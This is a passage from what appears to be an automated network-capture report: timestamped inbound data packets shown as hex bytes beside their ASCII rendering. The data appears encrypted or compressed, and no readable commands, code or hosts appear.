6a c5 33 1c 80 fd 90 e1 3b 58 49 4e 93 bc 8e b0 9f 88 dc 73 ee e1 7f 29 fc 2d 3d c3 b2 7b 0f e5 0a bb b8 35 e6 84 37 a4 f5 81 7b d3 ca f8 7b 71 90 8f 4b 91 5d 63 8b 78 79 bf e4 f9 04 a7 e5 ea a9 bc ff 1e 20 41 28 a0 e7 ab Data Ascii: &3xUW9V"9(%?~V;"N<tVYNqVI/ >W;#b*C3MvZnP9a bwl:Pt=?xa o?Y+&]z/io+i3/qJ/j3;XINs)-={57{{qK]cxy A(
2022-10-03 14:13:31 UTC	108	IN	Data Raw: 59 b9 d5 55 96 14 2a f9 f6 42 80 b2 cd 85 b5 14 87 72 5d 73 19 2e 23 1c 5e 63 a9 b5 46 39 c9 b6 30 44 c7 95 85 6f 22 33 fc 7f e0 0d 1e 93 0c 17 f1 db 95 a8 7b ec f7 3d 01 ff 53 c9 0a 3c 53 c1 8c 25 e7 76 5b 8f ff fc 78 09 c9 51 7c 32 7c d9 84 fb 0c 26 a4 b5 d8 14 a0 46 75 a3 11 80 84 71 3e 1a 83 ae 0f 83 7d a0 50 13 42 62 14 69 4a 6c 98 3d 4b 6d 6d bd 29 47 d2 1a c2 57 e9 14 1c 99 92 a6 83 f7 8a 37 5a 06 8c 7e 67 03 08 3c 29 83 ed 28 e5 21 3f c8 4c a2 c5 8b 54 6e 4f 88 ae 14 7a 81 db c9 93 82 b1 23 65 88 ca 36 bf 38 2e ec 87 1e 92 c7 fc 21 1c f1 b8 38 6e fe 20 0e 5f 1f 0a 3f ab fa b8 5b b5 8a a9 64 22 92 11 28 69 63 2a 23 58 45 0d 04 ff 9b 39 52 c1 90 2f 43 61 84 99 aa 7f 04 da 82 78 04 e4 7f 8a 8f 25 f6 ab 33 21 16 d0 1e 89 76 38 65 f4 a4 4b 2f d1 c1 0d Data Ascii: YUBr]s.#^cF90Do"3{=S<S%v[xQ\|2\|&Fuq>}PBbiJl=Kmm)GW7Z~g<)(!?LTnOz#e68.!8n _?[d"(ic#XE9R/Cax%3!v8eK/
2022-10-03 14:13:31 UTC	109	IN	Data Raw: 5e 3f 55 c8 ef e1 a3 29 b3 32 eb 21 a8 48 e3 aa 50 26 21 eb 34 1c 37 82 02 2b c5 73 9b fa cf c6 da 97 7c f8 62 af 21 12 05 8d 9b e7 db 86 01 3f 70 f0 df d3 b0 20 58 4e bb 80 b1 84 d5 2a a4 97 9d f8 a3 a8 84 61 e9 5f 31 83 1c ce 70 06 c0 fc 11 16 86 d6 e3 05 2c 51 47 15 30 9b fd d2 02 99 a7 91 80 f1 25 5a f9 57 fc ca 3c c8 06 94 05 e8 4c cb b3 5c f9 40 5d 18 5b cf fc 54 76 4a 64 95 98 37 a8 92 32 c0 bc 9e e3 e4 d8 9d 96 d4 e8 35 73 2e 6f b0 4f 7c 2b 9f 76 e4 a9 c4 92 3a e2 c8 1f 34 0d 4a 09 73 a5 23 10 a7 d3 fa 1a 98 68 05 22 78 3a a3 51 89 55 43 67 31 ca 0b 0e 02 63 31 e0 71 35 54 9d c8 f6 96 61 d6 3b 2b 46 4f 62 a1 30 6d f0 db d4 18 91 67 d3 1f 7e be c7 bd 71 da 21 b1 13 f9 3e 75 c7 b4 26 7b c0 a3 af 10 f0 43 b2 60 31 7e 58 d4 84 ad b5 9a 03 8e c9 74 c8 Data Ascii: ^?U)2!HP&!47+s\|b!?p XN*a_1p,QG0%ZW<L\@][TvJd725s.oO\|+v:4Js#h"x:QUCg1c1q5Ta;+FOb0mg~q!>u&{C`1~Xt
2022-10-03 14:13:31 UTC	110	IN	Data Raw: 89 c4 4b 38 7d a2 a2 2a 2f 15 a7 ac ec 8d 5f ec 28 3a 9d 6c 27 cf a5 d5 77 15 d1 82 2c a6 3e 55 94 65 38 92 87 b8 10 16 af 76 8d 0c 67 46 86 29 0c 65 2d 25 d2 46 99 cd 43 68 04 09 ef bf a6 83 9e b0 8a d4 48 8d 72 48 70 17 20 0b 92 2e 6a 91 dc 91 0c 37 a9 31 55 b7 d9 95 64 39 3b 71 cf ce 1d 05 85 21 a2 47 d9 93 cd 16 5e f5 3b 14 f9 56 54 79 9f 5a de 8d f3 55 58 44 94 f1 ed ff 72 e1 7b be 3c 54 6c ae 38 02 2f ba 35 83 db a2 46 79 e4 9d 83 84 7d 28 0f 06 d6 bd 90 76 b6 86 a1 6c 73 0f 44 d6 af 9c 37 44 5f c6 0b 46 94 c1 1c d5 39 be 15 0d 96 92 90 6e f9 a6 0f 44 1e a8 91 6e b5 35 f1 3c 8a e9 7b 70 24 3f ca 53 9b b1 1d e3 f9 09 e4 b0 37 63 a6 1c d9 9c 9b d2 9c 65 a4 fd 2b b2 58 94 ee 96 1f 91 53 8e bf 18 f7 a1 19 c3 ef 2b 04 5f 10 09 19 d9 6e a8 53 97 62 1e 66 Data Ascii: K8}*/_(:l'w,>Ue8vgF)e-%FChHrHp .j71Ud9;q!G^;VTyZUXDr{<Tl8/5Fy}(vlsD7D_F9nDn5<{p$?S7ce+XS+_nSbf
2022-10-03 14:13:31 UTC	111	IN	Data Raw: 42 ee 0c d7 c1 99 3a ec 75 56 cd 91 50 6c df 55 e6 c0 90 e7 96 bd ed 62 2e 1e 4c f3 07 46 d8 68 55 c9 0e 54 0c e6 89 e4 37 78 83 5e 0c b2 85 6d fb 79 93 3d a4 3d 39 55 c8 c3 ab a1 22 9b e8 e5 3e 8a ba f3 82 4d 33 3e 9e bf 55 32 88 6d 98 e2 60 9e dc cf cd d4 da 94 96 fb 95 23 1a 69 30 93 89 06 24 0a 54 b1 f5 c9 ba 76 90 5a 44 de 52 06 86 df 06 9d 25 8e fc bf c5 4a 2d e8 55 5a 5c a6 cc 7a 2a f9 42 3b dd 8d fe 5e 0b 3d 5f 3b c1 20 9e ea c8 5e e5 1d 90 91 f4 55 ce 05 56 da e5 15 df eb 6e ec 98 c0 d9 bc 56 87 e3 44 e6 50 c5 e3 52 25 ce 64 95 9a 16 6b 7c c7 29 b1 87 fb 3e da 86 9a fc 3d 22 4e 35 7c cf 17 12 9e 9a 05 5f c4 68 9a 44 5d ec 0e 33 32 2b 18 7e be 38 41 1f 1f e1 cd 7b 4f 16 2b 6b 2d b9 46 a9 71 51 5e 55 c7 5b 09 12 67 1d 23 61 31 84 3a ef f4 96 69 ed Data Ascii: B:uVPlUb.LFhUT7x^my==9U">M3>U2m`#i0$TvZDR%J-UZ\z*B;^=_; ^UVnVDPR%dk\|)>="N5\|_hD]32+~8A{O+k-FqQ^U[g#a1:i
2022-10-03 14:13:31 UTC	113	IN	Data Raw: 8a 62 c5 0d c3 ee 8f be fa 73 25 00 13 c0 f0 c2 78 c6 59 f3 b2 53 50 c3 1d 97 72 ec dd c1 76 41 05 ad f7 3a 2b 2c b9 3b 62 73 09 9f b0 3c 16 18 83 6b aa 46 37 89 d9 a6 36 51 ba 95 ca 09 eb a6 9f ce a6 62 14 c6 ca 9d 7e ca c1 89 e5 7a 71 b4 7d 2d 8e 6c e6 ed 2b 33 8a e9 b8 13 16 af 76 bc d1 16 f4 8e 3f 46 59 91 27 d2 53 be 9e 25 95 ea f9 ef a9 4b 8d b2 d6 87 b0 1e 72 73 60 6b 17 22 ca 91 f0 6a 91 df 91 30 36 a9 31 44 c4 8a 8e 77 32 3d 13 71 d3 51 f1 95 08 9d f7 d9 90 b4 8f ef f7 31 00 9a 33 70 08 2d 52 f6 34 d9 e6 50 6c 2a fa fa 63 1b 3c a9 bf 36 7a ac 1d 3a 08 2c dc 16 f2 69 aa 6e c5 ce 2e 8b 86 0c 6c 17 90 a1 7c 2a 74 bc a4 3a d4 71 05 66 4a 16 9e 3d 47 2a 81 bd 29 4b de 51 cc 4b e2 05 02 8d 93 55 7c da 87 17 5a 08 83 7e 66 0f 3f f5 47 59 87 23 20 25 3f Data Ascii: bs%xYSPrvA:+,;bs<kF76Qb~zq}-l+3v?FY'S%Krs`k"j061Dw2=qQ13p-R4Plc<6z:,in.l\|t:qfJ=G*)KQKU\|Z~f?GY# %?
2022-10-03 14:13:31 UTC	113	IN	Data Raw: d2 81 63 c3 63 c1 bd c0 3b b7 76 23 b0 08 d3 28 fd 7f b0 30 15 5d 59 af 1a 95 c7 46 60 3b 52 5e 5e 17 a3 9d a8 2b 78 c3 67 c4 2e df 29 fc bb 54 11 a6 5b bb 69 88 bb 24 32 ea 9b 2a cc 38 86 64 c0 e3 4c 7d a7 1f 48 4d 8e 47 41 3c f4 d0 bf 78 fe 0a b2 fd 1f 9c ba e0 05 28 54 28 a0 ed 1f f3 60 13 ec e0 a0 42 08 bf dc 82 a1 0e da 67 fc 1d bd bc 52 70 94 10 06 57 1d 6b 47 ab 61 3e 18 b0 b5 a9 1c 39 61 c6 86 c4 13 91 c5 e4 99 79 56 01 30 97 24 1d e6 6e 33 a2 9e ed ba cb f9 09 2a ba e2 d3 d7 1a df cd db 5f 7a 4a fc a7 6e ac c5 b5 e7 bd 96 93 c6 fa c7 76 1c f4 29 2d 43 00 11 73 79 21 22 a1 35 1e 09 47 06 51 91 68 96 ee bf 56 9f aa 9a d3 3b 1d a0 3f 6e 9e 50 ed 28 39 aa a7 d9 ce 83 e3 f9 ec 9f 83 2d 8a bb e4 96 6f 1a 17 ed cb a8 07 a4 6a 29 39 65 46 8d 2c 4b 49 a6 Data Ascii: cc;v#(0]YF`;R^^+xg.)T[i$28dL}HMGA<x(T(`BgRpWkGa>9ayV0$n3_zJnv)-Csy!"5GQhV;?nP(9-oj)9eF,KI
2022-10-03 14:13:31 UTC	115	IN	Data Raw: c7 ba 18 d9 9e 93 08 71 69 99 c1 38 a3 15 b0 11 69 ea 9e 3f ea db 09 f1 ba 37 61 fc 15 68 b4 eb ee f9 a3 d7 aa 53 9f 31 e1 65 24 be 2f ad f8 72 7d 43 4b 40 11 15 f7 e8 99 5b de 8a c8 28 3e 3c 8a a2 62 fa 7a 88 67 1f df c0 88 9e 24 f9 3a e2 0c 15 ce 7e 33 74 29 64 92 ef 48 03 d1 eb 93 6c c5 43 34 cd 64 ba 48 e1 78 5c 43 a4 5d e1 73 c2 73 0a 0c 29 7b ff 18 1e 7b 5e 2e a0 16 18 d5 6c 62 11 bd 3b ba 20 cc e3 0e ae 0d a2 e7 9a a8 63 0e 22 3e 32 87 db e3 88 96 a0 be 9c 93 c0 74 a8 6d 10 60 5d 1f 53 ed 43 f5 d7 ba 9e a5 1c 18 75 8d 41 9c a9 12 ca 7c e6 72 62 c1 d0 c0 42 f0 76 4b 37 45 93 f9 65 5b c8 df 5a 44 a4 5a 78 b1 90 a3 9b 3a ec 67 d8 cd 91 52 55 f0 56 fe 16 92 f8 98 b5 02 70 33 95 58 e2 0d 2a 70 79 5a c3 01 31 60 15 75 e5 11 43 32 27 40 b9 ad dd fa fd 08 Data Ascii: qi8i?7ahS1e$/r}CK@[(><bzg$:~3t)dHlC4dHx\C]ss){{^.lb; c">2tm`]SCuA\|rbBvK7Ee[ZDZx:gRUVp3X*pyZ1`uC2'@
2022-10-03 14:13:31 UTC	116	IN	Data Raw: 0f 15 1e 88 30 64 bf 2e 06 a5 1c 1f 1e 66 7e 0e 24 6c 27 48 58 b2 8d 7b 70 09 66 22 3d 42 66 19 2f 73 ba 09 b5 b3 f6 ed 3d c4 2d 3d 54 fd 2f a0 30 67 f0 e5 c6 1c 6b 63 c5 70 cb be c7 a6 08 65 27 89 cc df 2f 71 d6 a1 34 0b 7e 5c ae 36 99 fb 9a 7f 37 4b 4d d2 84 a7 83 57 02 a2 cb 6f d9 d0 73 36 f5 a2 3f dc b6 5f a7 1b 0b 97 21 18 a1 89 3b b3 69 96 60 d8 14 5c 57 74 98 19 50 9d 41 43 2a 7c 64 41 79 d3 1e 95 d7 8d 26 be e0 15 04 b8 d6 a1 cb 34 1d 73 17 e6 e6 28 d9 f6 be f1 a4 41 0c a1 3f d5 bd b9 32 ef 6c 91 22 b5 53 1d 70 2c 7a 6a c0 1f e1 e8 ae 09 0e 00 55 24 d7 17 90 c5 e9 81 fc 01 00 1c 9e 04 ef d7 62 26 80 7b e9 ba d0 ea 9e 56 bb ce f3 fd 97 8d cc d1 73 ce d2 93 a4 64 ae c8 35 e7 79 96 93 ca 19 fa 74 1c ff 2c 61 3a f3 c6 9d 65 32 2c b2 2d 18 16 3d 16 71 Data Ascii: 0d.f~$l'HX{pf"=Bf/s=-=T/0gkcpe'/q4~\67KMWos6?_!;i`\WtPAC*\|dAy&4s(A?2l"Sp,zjU$b&{Vsd5yt,a:e2,-=q
2022-10-03 14:13:31 UTC	117	IN	Data Raw: 77 06 44 a4 af 9c 37 3e d6 51 bc 23 5e c5 0a cc 42 f3 10 62 55 8f ab 77 99 22 1f 4b 0b 3d 7c 6a b2 01 fe 3c 87 84 c8 22 25 35 a1 93 88 b8 81 45 6e b7 4a af 14 71 81 08 c8 93 8e f6 62 65 88 c6 ff a2 2d 34 ea 87 10 bd e0 23 01 0b f3 87 36 61 e9 44 6f 4e 14 1b 1d a8 d0 c5 99 9f 4a a7 72 3e ac 43 c8 68 69 3b 91 86 41 11 1d dc d2 2a 59 d8 a8 2d 43 4d 88 e7 ef 68 d2 c3 81 65 13 98 be 88 9e 24 fb 4f 24 62 f4 c9 0d 84 5e e4 6f ec 50 62 4a d9 c3 23 46 39 48 1c 76 09 f7 42 f2 7d 47 50 ad 21 38 62 d2 52 7b 02 30 1f 21 fb 1f 71 47 34 e2 a9 ab d7 66 64 3e 26 e3 be 2a db 9c d8 76 7e 10 dc 2d a3 4b bd 08 e5 3c af 69 ec 81 b4 64 d5 4c 94 af bc 2f 7e 14 4e 53 15 6a 3e 29 22 55 88 c2 75 1d 12 7e fc f6 f1 63 1a b4 c3 fb 4a 72 ff 09 23 43 fa 72 18 b7 45 93 f7 3e aa c8 df 56 Data Ascii: wD7>Q#^BbUw"K=\|j<"%5EnJqbe-4#6aDoNJr>Chi;AY-CMhe$O$b^oPbJ#F9HvB}GP!8bR{0!qG4fd>&v~-K<idL/~NSj>)"Uu~cJr#CrE>V
2022-10-03 14:13:31 UTC	119	IN	Data Raw: de 12 91 02 82 e5 34 b2 7a 9e fd 5b 11 c0 e5 f0 43 5b 81 74 90 88 d1 71 ad 3b c1 be 91 f4 2f ce 96 8f 27 c2 0f 60 01 7b 8c 14 ec 61 61 71 81 a1 68 90 30 c2 ee 0e 22 2a 99 1a 41 b4 2e 01 b4 e3 1e 23 66 e7 b2 27 e5 8b 60 4e 44 98 86 ff 13 c5 20 47 18 65 1e 29 fe 82 7a 61 b2 f4 9c 68 d3 2a 3b de d0 06 2e 87 4f 1a d5 c5 16 87 69 1b 60 ee 97 f1 b7 1e 7c 2f a5 13 f7 18 71 d6 ba ee 14 73 88 af 1b 8f ef b0 60 3b 58 49 ff b8 a3 8d 8c 03 8e c2 74 fe 04 7f 11 fc b1 3b d4 a6 5b ac f3 06 90 0e 33 f1 8a d6 b6 45 8f 17 14 e8 5d 71 7a 89 1f 4d 86 52 bd 3a 54 7b a7 74 ff 13 a8 04 92 19 b8 f7 08 00 a7 31 5e e6 1b 07 4b 11 cd 23 2b c2 67 6b dd aa 5d 24 c9 5d d6 bd 84 bc 58 61 94 39 a6 46 0b 6d 03 4e 60 36 06 33 e1 84 15 3f 15 9c 2e c4 19 9b cd e1 9e fd e8 ff 31 ba 0e fe ea Data Ascii: 4z[C[tq;/'`{aaqh0"A.#f'`ND Ge)zah;.Oi`\|/qs`;XIt;[3E]qzMR:T{t1^K#+gk]$]Xa9FmN`63?.1
2022-10-03 14:13:31 UTC	120	IN	Data Raw: 55 2a 3c e4 54 d6 22 b1 58 de 8d cf ce 9e 47 9e fe ec e4 06 53 79 bf 22 68 cb 84 a4 08 26 a8 8b e1 69 a0 4c 60 c7 3f 84 ac d1 21 16 9a 8d f3 93 76 ba c1 44 6e 73 0f 7d 6e d9 90 3d 4d 5e 41 b7 5d 41 c1 1c c4 6c 08 15 0d 94 9e a6 69 26 22 1e 4b 00 a2 7b 6f 99 2a d0 78 81 eb 06 39 a8 38 ce 5a 8b ab a8 45 4b 71 6a a2 3c 61 a9 1c c2 31 95 fd 75 1a e4 cd 29 b5 89 34 cf 8e 0a 97 b5 7f 0d 1a f6 09 20 53 fe 09 1f 6c 00 05 d8 27 85 aa 53 9c 59 89 75 00 ac 3b b5 78 4d 2a ae d7 51 35 0f e2 07 39 7d c9 a8 73 42 4d 84 ae b3 4c c4 59 a6 6c 04 d5 62 10 b6 3f e1 55 38 1e 18 d9 29 95 e6 05 4c fd 78 5d 99 f3 d2 25 6e cf 99 10 70 66 a1 6a e6 77 4a 58 83 ed f2 60 d8 2c 68 0e 2a 13 ce 76 1f 71 45 5c a6 64 aa d3 66 b5 e6 0b 39 ba 23 c9 db d5 75 7e 1c f2 17 a5 4b bd 21 2d 1b be Data Ascii: U<T"XGSy"h&iL`?!vDns}n=M^A]Ali&"K{ox98ZEKqj<a1u)4 Sl'SYu;xMQ59}sBMLYlb?U8)Lx]%npfjwJX`,hvqE\df9#u~K!-
2022-10-03 14:13:31 UTC	121	IN	Data Raw: 11 46 d4 2a 11 95 fc 1b 9d 6f 8d fc b3 65 20 43 fd 41 4a 07 82 ce 7a 2a f9 52 39 dd 8d fe 00 08 3d 53 47 0b 33 bb c4 01 16 f6 18 aa 66 05 b5 09 25 59 e4 c9 d3 db 39 91 13 9c 96 ab b3 56 9c 30 2c 01 50 e9 eb 43 4d 90 76 84 84 07 39 83 38 d0 85 68 f5 3e cd e6 c8 d9 c3 29 4a cf 7f b4 5f 7c 84 9f 76 e8 d5 7e 81 2c 87 f1 0f 39 1c 8a 75 84 b5 2e 0b dc fd 1f 32 62 7f 6a de 6a 3c bc 36 81 8e 50 74 35 aa da 47 13 6d 76 34 71 35 54 a3 dc 0e 97 6b cf 42 18 51 67 03 b3 27 76 f8 fd 63 1c 80 69 ed 8c ca bf c1 d8 48 76 23 bb 08 c8 3e 67 b9 af 31 14 73 b4 c0 e0 9e ef ba 0f 24 59 49 d4 82 cc 67 a8 03 84 ac 46 cf 06 79 01 16 b0 3b da b4 4e ac f6 1b ae 50 3f f9 92 33 d8 73 86 64 c2 f9 45 6a 62 81 0b 22 91 44 43 3d 6e 16 45 79 ff 11 d1 e5 92 35 bc f8 6b fa ae 28 aa 88 16 04 Data Ascii: Foe CAJzR9=SG3f%Y9V0,PCMv98h>)J_\|v~,9u.2bjj<6Pt5Gmv4q5TkBQg'vciHv#>g1s$YIgFy;NP?3sdEjb"DC=nEy5k(
2022-10-03 14:13:31 UTC	122	IN	Data Raw: b9 c9 53 42 eb 07 dc 8a 49 96 a3 d2 06 18 38 ac 73 4c 78 19 0f ce 0a 72 7b 86 c1 9d 38 37 85 27 46 dc 84 9f 4c d2 39 02 78 e4 e1 0e 94 22 f9 22 d9 93 cd 51 ac f6 3b 18 ef 65 d1 1d 2d 49 c9 98 c3 18 5b 68 94 f1 c3 31 ff ac 86 a1 2f 6f c8 ac 29 1f 39 87 5d f1 45 ac 57 63 cf 41 c4 85 77 27 09 b6 b6 18 92 67 ab b1 0e 90 72 29 78 73 bc e2 51 4c 45 54 ad 3a 65 d6 1d df 42 f1 18 12 8f 9e bc 7d e7 b1 01 50 ff 8b 43 4c 88 32 97 32 82 eb 06 36 4a c5 cf 5a 80 d7 94 55 68 61 63 c0 ee 71 a9 16 a7 b2 85 de 64 77 99 d3 35 a2 3c 25 fd 81 0e 71 38 d1 04 64 c3 ab 31 7a e0 37 1d 59 14 00 d6 b5 c1 54 52 b1 5a bc 60 0c 5f 2c 29 63 53 ed 44 b4 bf 0e 0f e7 8c 28 48 c9 9f ce bc 4c a2 ab b3 65 bd d6 8b 67 13 e1 1b 70 9f 2e eb 3a 2d 0c 15 ce 15 ed 8c 28 6e e6 35 6b 02 db c5 36 60 Data Ascii: SBI8sLxr{87'FL9x""Q;e-I[h1/o)9]EWcAw'gr)xsQLET:eB}PCL226JZUhacqdw5<%q8d1z7YTRZ`_,)cSD(HLegp.:-(n5k6`
2022-10-03 14:13:31 UTC	124	IN	Data Raw: 38 43 36 dd c5 b0 3a 90 f9 ed 39 50 45 de ac 6a 20 1c 67 83 66 ed 8a 6d 8d ef 85 90 dc d8 d4 35 92 40 89 d5 86 fc 1a 6a 2b b3 fc e1 a6 10 85 61 f4 c9 b3 04 21 49 3a e0 2c b3 8e d5 0f c6 a7 8d fc bf cc 09 f4 e9 55 5e 28 71 10 78 20 db f4 31 f5 f1 d4 e5 0f 52 4e 56 10 2b b2 d8 df 3c 81 10 90 86 94 b9 f6 fb 5d da cb 25 da 1f fe 18 86 f9 c0 ab 8c f9 e0 5e 18 5b e3 ef 56 31 5e 67 95 94 02 2a 83 3e a5 49 95 f4 34 a4 69 87 d9 c9 08 2e 22 56 41 5d 13 98 f1 6d ec c6 62 bc 38 c3 d3 06 11 d1 9f 1a 78 db eb 01 b3 e8 32 02 6c 76 38 4b fb 3d b6 53 93 8d 56 1d 64 c7 20 4c 1b 71 10 44 7c 34 52 bf bb fd 81 bd cd 42 32 51 67 0f a9 ea 70 39 ba c9 1d 80 69 aa 91 c9 bf cd b0 71 94 21 b1 13 e6 4e 8e 29 4f ee 1e 72 8e a9 1d f0 8e b0 60 31 84 63 d2 95 a2 8d a9 03 8c c3 6a ce a0 Data Ascii: 8C6:9PEj gfm5@j+a!I:,U^(qx 1RNV+<]%^[V1^g*>I4i."VA]mb8x2lv8K=SVd LqD\|4RB2Qgp9iq!N)Or`1cj
2022-10-03 14:13:31 UTC	125	IN	Data Raw: ee b5 23 79 50 9b d5 2e 3f cd cd a8 9f 50 e8 26 2b 18 79 f4 c0 af eb 6b 4e 31 83 2c a2 57 cc 6d 64 32 8c c7 a1 dc 7b ae 7c a1 a4 7a dc a9 12 42 57 39 3a f2 eb a8 de 4c 72 3d fd f1 85 5e a8 d8 b9 e7 ae 07 88 6d 6c e2 23 09 d3 3b 6d 4a b1 68 b9 c6 36 b3 13 ac cd 95 92 4e 57 43 6d 7f cc 19 10 b5 be f4 d8 d5 b5 d8 1f cd 4d 3b 1e f0 5a ea f1 2c 58 d8 ad b1 98 35 45 9e fc e5 4b 9b 76 54 b0 10 63 fd 8c 86 08 26 a2 b9 d8 92 a1 46 75 e6 44 ff eb 76 21 12 8f 86 95 b7 5b b2 88 0d 4d 53 c7 6c 62 ad 87 15 b6 44 50 ba 03 27 bf 73 de 44 e6 0b 29 08 a8 86 73 d0 b9 3a 6b c6 8a 6f 6f 82 08 03 2c 83 ed 2a 4a 5b 50 cf 5a 8e a7 ae ce 4d 4a 75 89 0b 55 89 d0 c8 93 84 c5 4a 9f 89 cc 2f 9b 41 5b 83 97 15 8b 26 db 97 3f da a5 17 6f cb 0b df 4e 14 11 d6 82 2d ab 53 9b 60 c7 1a 4b Data Ascii: #yP.?P&+ykN1,Wmd2{\|zBW9:Lr=^ml#;mJh6NWCmM;Z,X5EKvTc&FuDv![MSlbDP'sD)s:koo,*J[PZMJuUJ/A[&?oN-S`K
2022-10-03 14:13:31 UTC	126	IN	Data Raw: 5d 96 b6 3e 86 77 c6 5c 08 cc 91 43 5b 1a 47 e9 c6 ab 86 f7 ca 12 63 06 06 14 7a 2b 74 ce 5d 45 87 3f 0e 11 a7 77 fa 10 43 7a 24 40 b5 af 07 86 92 03 26 e0 be 70 cf ed f1 e6 94 32 d4 d9 8a 23 ae 44 ed a4 69 d9 36 84 87 37 5d f6 02 86 c7 77 8e 8c 44 e7 e6 9d 4c 88 87 8e 4b 1a 6a 21 85 cf 2a a1 10 3d 4b 9e b7 d3 04 21 5c 5b 85 b6 96 a9 d1 2a aa c2 ac 8c b7 c7 31 7a c1 ae 5f 2f 18 e4 10 5e be f9 39 d9 98 84 7f 2c 10 5b 72 0f 73 be 98 d5 14 f6 0b b8 7b fa 4a f0 d1 3d 88 83 2c cd 13 8e 40 1d dc e7 bd 70 89 bf 7f 6f 53 e9 ed 4c 76 7a 64 95 98 05 1a ff 57 d7 ad 90 eb 6a 51 ac a8 d7 e5 3c 36 0a 03 b6 59 13 83 b6 8d ef c6 6e ba 50 96 81 0f 39 1e 83 4f e4 91 03 0f 95 fd 4b 12 e0 6b 05 24 77 14 4d 58 9e 89 7a 18 5c aa 21 46 17 78 4f b1 55 18 5c 93 ac a2 b6 e1 c7 2d Data Ascii: ]>w\C[Gcz+t]E?wCz$@&p2#Di67]wDLKj!=K!\[1z_/^9,[rs{J=,@poSLvzdWjQ<6YnP9OKk$wMXz\!FxOU\-
2022-10-03 14:13:31 UTC	127	IN	Data Raw: 02 93 d5 c0 ee 81 b7 c7 78 f7 d2 e2 f9 d2 ac 57 a7 4c fc ad 7f 86 39 30 88 76 bd fd be 19 44 76 18 ea 44 bb 77 21 36 44 66 5f 08 d7 38 1c 0e dc 1e 75 42 c9 96 e8 9f 57 2f c4 9b d5 2c 0a d8 29 e2 b3 5f ca 26 4a a2 32 dd ce 89 eb 7c 46 64 82 2c a4 67 62 e8 0a 33 8a e9 eb 22 14 af 7c 3f 9e 48 54 aa 1f cc 71 26 25 f2 2e ac de 4c 77 19 2e 0b 84 58 84 98 45 f6 c0 06 8c 76 6c f9 06 24 dd 87 57 47 80 f8 99 47 36 a9 3b 77 4f 91 94 64 25 15 f9 7f cc 1b 25 16 5a be f4 db 97 e7 bc ed f7 3b 84 d5 6d d3 2c 0d da de 87 db c6 df 40 9e f8 e3 41 fa 52 79 b8 1c fe a1 c3 39 08 22 82 20 f0 69 a0 dc 56 e1 3f a7 a4 f4 21 16 90 85 87 96 76 bc b9 3a 95 72 05 6a 48 2f e2 52 4c 45 54 9c ad 4d c1 1c 45 61 cf 05 2b b2 09 ab 7d f6 86 97 4f 01 8a 77 47 62 21 f8 2b a9 69 7e 4f 24 3f ca Data Ascii: xWL90vDvDw!6Df_8uBW/,)_&J2\|Fd,gb3"\|?HTq&%.Lw.XEvl$WGG6;wOd%%Z;m,@ARy9" iV?!v:rjH/RLETMEa+}OwGb!+i~O$?
2022-10-03 14:13:31 UTC	129	IN	Data Raw: 9c 98 c4 4a 92 c0 6d 24 56 e5 63 5f 1a 68 65 53 4d 52 a0 f5 55 b8 18 73 fe 6a bb 84 0a 92 e9 41 72 68 e9 46 e2 44 fa 74 2f 75 6c 68 fc 16 e5 e0 59 2e 03 1f 58 7c 9b 1e 18 99 3a 7c 2d 27 de b7 74 d5 e1 46 e9 e0 ae ee 89 a5 0c 6f 2a e2 5b e0 08 73 43 05 35 c8 1f 5f 33 00 77 e5 1b f1 a4 08 51 95 a5 ce f8 fd 02 06 df a7 3f 55 d3 f4 12 b3 2d 9d d3 68 5f c1 45 f2 aa 61 8a 37 84 81 87 12 a5 7c a1 e7 db 91 dc de e2 8b 95 6a 97 cc 86 da 19 6a 27 b3 61 af cf 11 3b 65 d4 60 bc 05 21 c2 61 f9 3e 95 a4 76 0c b5 93 ac b9 b3 c7 31 7f e5 7d a5 2e 1e c8 50 a2 af 97 38 dd 83 f6 4f 09 3d 55 ce 35 0c 8f ca f7 be f6 12 90 a0 aa 4c f6 fb 4d de 17 2c cd 11 bb 95 f9 96 cb b3 52 b6 47 5f 18 51 73 c8 7d 4c a7 45 3e 9e 2f 70 a1 6d d0 ad 94 eb 35 e3 72 84 d9 c5 09 e4 54 11 b5 59 17 Data Ascii: Jm$Vc_heSMRUsjArhFDt/ulhY.X\|:\|-'tFo*[sC5_3wQ?U-h_Ea7\|jj'a;e`!a>v1}.P8O=U5LM,RG_Qs}LE>/pm5rTY
2022-10-03 14:13:31 UTC	129	IN	Data Raw: 84 0e ee b3 3e de 62 64 a8 fd 2e b1 2b 3a e0 be ee 8e 39 fb 27 9c 89 c4 30 70 e9 0b b5 4e 14 11 5b 8f fb b8 75 bd f1 ad 64 24 9a 11 2e 69 69 22 9d 63 bb 10 17 f2 b1 aa 27 b1 81 d1 46 6d 32 88 a2 68 48 ec a7 76 33 d7 c8 8a 9e 2e c1 34 35 0d 15 d0 25 79 77 29 68 c6 d8 34 6c da c3 21 4e 78 49 1c 70 fc 9f 6f e3 51 6a ef ab 4e f2 40 b1 5f 64 0e 33 20 b5 1b 1e 77 6b a4 b4 0a ab d7 68 48 87 0e 39 ba b0 f8 de 04 50 5e a4 e5 9a a2 6b db 27 3e 38 b0 76 c9 73 9d b8 d7 66 14 be 1d 2e 7e 1a 42 e0 1c 42 e3 b7 07 7e b2 d7 55 a2 18 73 fe d0 e1 ae 18 b4 d6 e9 5a 93 e8 66 c4 68 78 0a 5f 7b 44 97 dd d6 e3 ca df ca 49 33 49 5e 9b 78 18 99 3a c6 84 0d cc 91 4d 5b 1a 47 e9 c6 ab 6a f7 ca 12 63 06 39 9b e0 0e 59 5b 5e 77 d8 39 7b d2 a7 77 e5 3b e4 86 25 40 aa ad 92 f9 fd 04 0c Data Ascii: >bd.+:9'0pN[ud$.ii"c'Fm2hHv3.45%yw)h4l!NxIpoQjN@_d3 wkhH9P^k'>8vsf.~BB~UsZfhx_{DI3I^x:M[Gjc9Y[^w9{w;%@
